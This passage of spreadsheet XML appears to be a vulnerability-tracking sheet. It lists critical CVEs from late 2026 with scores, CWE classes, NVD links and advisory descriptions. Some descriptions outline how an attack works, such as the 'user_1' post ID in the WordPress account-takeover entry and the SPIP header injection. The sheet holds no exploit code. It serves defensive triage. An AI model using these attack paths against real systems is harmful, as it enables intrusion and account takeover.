      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75816</t>
        </is>
      </c>
      <c r="C242" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D242" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E242" s="5" t="inlineStr"/>
      <c r="F242" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Authentication Bypass to Account Takeover in all versions up to, and including, 3.29.12. This is due to the pre_update_value function lacking any capability or ownership check, and ActionPost::conditions_logic() short-circuiting its current_user_can('edit_post') authorization gate whenever the post ID is non-numeric — such as the string user_1 — allowing unauthenticated form submissions to be routed to arbitrary user records without restriction. This makes it possible for unauthenticated attackers to overwrite any user's registered email address, including an administrator's, and then leverage WordPress's native password-reset flow to fully take over the targeted account.</t>
        </is>
      </c>
      <c r="M242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75816</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76578</t>
        </is>
      </c>
      <c r="C243" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D243" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E243" s="5" t="inlineStr"/>
      <c r="F243" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L243" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. The self-managed OTP token ACI does not require authentication and does not restrict which attributes may be added alongside the token entry. An unauthenticated LDAP client can exploit this, combined with a related flaw in the underlying directory server's ACI evaluation (tracked separately), to create an arbitrary attacker-controlled Kerberos principal and have it added to the administrators group. This allows a remote, unauthenticated attacker to obtain genuine FreeIPA administrator-group membership and perform administrative operations against the directory and, on SID-enabled deployments, other IdM services.</t>
        </is>
      </c>
      <c r="M243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76578</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76904</t>
        </is>
      </c>
      <c r="C244" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D244" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E244" s="5" t="inlineStr"/>
      <c r="F244" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G244" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L244" s="5" t="inlineStr">
        <is>
          <t>GeoTools is an open source Java library that provides tools for geospatial data. Starting in version 30.5 and prior to versions 33.6, 34.5, and 33.6, an SQL Injection Vulnerability is present when executing OGC Filters with PostGIS DataStore implementation: `jsonArrayContains` function; Requires PostGIS 12 or greater with a String or JSON field. For PostGIS 12 and greater `jsonArrayContains(&lt;column&gt;, &lt;pointer&gt;, &lt;value&gt;)` function writes `&lt;value&gt;` into generated SQL without escaping. Patches are available in versions 33.6, 34.5, and 33.6. No known workaround is available. To limit scope of SQL Injection the PostGIS connection pool should be configured with limited rights.</t>
        </is>
      </c>
      <c r="M244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76904</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="C245" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D245" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E245" s="5" t="inlineStr"/>
      <c r="F245" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G245" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2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45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77647</t>
        </is>
      </c>
      <c r="C246" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D246" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E246" s="5" t="inlineStr"/>
      <c r="F246" s="5" t="n">
        <v>0.026</v>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.20 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to incorrect identification of &lt;?php blocks, and var_export's mishandling of certain cases such as presence of a '&lt;' character.</t>
        </is>
      </c>
      <c r="M246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77647</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77649</t>
        </is>
      </c>
      <c r="C247" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D247" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E247" s="5" t="inlineStr"/>
      <c r="F247" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr">
        <is>
          <t>The internment crate 0.8.7 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="M247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77649</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77650</t>
        </is>
      </c>
      <c r="C248" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D248" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E248" s="5" t="inlineStr"/>
      <c r="F248" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr">
        <is>
          <t>The append-only-vec crate 0.1.9 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="M248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77650</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77651</t>
        </is>
      </c>
      <c r="C249" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D249" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E249" s="5" t="inlineStr"/>
      <c r="F249" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>The arrayref crate 0.3.10 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="M249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77651</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77806</t>
        </is>
      </c>
      <c r="C250" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D250" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E250" s="5" t="inlineStr"/>
      <c r="F250" s="5" t="n">
        <v>0.042</v>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L250" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.21 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to code injection via an X-Spip-Filtre HTTP request header that is mishandled by analyse_resultat_skel.</t>
        </is>
      </c>
      <c r="M250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77806</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78362</t>
        </is>
      </c>
      <c r="C251" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D251" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E251" s="5" t="inlineStr"/>
      <c r="F251" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr">
        <is>
          <t>The SEO Flow by LupsOnline WordPress plugin before 3.0.3 does not correctly validate the credential supplied with its API requests, allowing unauthenticated users to be served as the administrator who configured the SEO Flow by LupsOnline WordPress plugin before 3.0.3 and take over the site. Exploitation requires the SEO Flow by LupsOnline WordPress plugin before 3.0.3 to have been configured, which is its normal operating state.</t>
        </is>
      </c>
      <c r="M251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78362</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="C252" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D252" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E252" s="5" t="inlineStr"/>
      <c r="F252" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G252" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78509</t>
        </is>
      </c>
      <c r="C253" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D253" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E253" s="5" t="inlineStr"/>
      <c r="F253" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G253" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H253" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78510</t>
        </is>
      </c>
      <c r="C254" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D254" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E254" s="5" t="inlineStr"/>
      <c r="F254" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G254" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H254" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78573</t>
        </is>
      </c>
      <c r="C255" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D255" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E255" s="5" t="inlineStr"/>
      <c r="F255" s="5" t="inlineStr"/>
      <c r="G255" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway 1.0.0 through 1.0.7 could allow a remote attacker to gain administrative access due to the use of default credentials.</t>
        </is>
      </c>
      <c r="M255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78573</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7861</t>
        </is>
      </c>
      <c r="C256" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D256" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E256" s="5" t="inlineStr"/>
      <c r="F256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in Next4Biz Information Technologies Inc. CSM (Customer Service Management) allows Code Injection.
This issue affects CSM (Customer Service Management): before 8.0.3.</t>
        </is>
      </c>
      <c r="M256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7861</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78745</t>
        </is>
      </c>
      <c r="C257" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D257" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E257" s="5" t="inlineStr"/>
      <c r="F257" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr">
        <is>
          <t>An issue in HiDPT/ Weyon HiDPTAndroid Hi3751V350 Hi3751V352E_DMO allows a remote attacker to execute arbitrary code via the Android Debug Bridge (ADB) daemon (adbd)</t>
        </is>
      </c>
      <c r="M257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78745</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79391</t>
        </is>
      </c>
      <c r="C258" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D258" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E258" s="5" t="inlineStr"/>
      <c r="F258" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr">
        <is>
          <t>No authentication exists in the MQTT service of Trueview 6.0.23.4. The MQTT broker accepts client connections on TCP port 1883 without requiring authentication, allowing a remote attacker with network access to establish an MQTT session and perform unauthorized publish or subscribe operations.</t>
        </is>
      </c>
      <c r="M258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79391</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79569</t>
        </is>
      </c>
      <c r="C259" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D259" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E259" s="5" t="inlineStr"/>
      <c r="F259" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr">
        <is>
          <t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79570</t>
        </is>
      </c>
      <c r="C260" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D260" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E260" s="5" t="inlineStr"/>
      <c r="F260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr">
        <is>
          <t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79574</t>
        </is>
      </c>
      <c r="C261" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D261" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E261" s="5" t="inlineStr"/>
      <c r="F261" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr">
        <is>
          <t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t>
        </is>
      </c>
      <c r="M261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79576</t>
        </is>
      </c>
      <c r="C262" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D262" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E262" s="5" t="inlineStr"/>
      <c r="F262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr">
        <is>
          <t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t>
        </is>
      </c>
      <c r="M262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79689</t>
        </is>
      </c>
      <c r="C263" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D263" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E263" s="5" t="inlineStr"/>
      <c r="F263" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I263" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79689</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79724</t>
        </is>
      </c>
      <c r="C264" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D264" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E264" s="5" t="inlineStr"/>
      <c r="F264" s="5" t="inlineStr"/>
      <c r="G264" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary OS commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79724</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
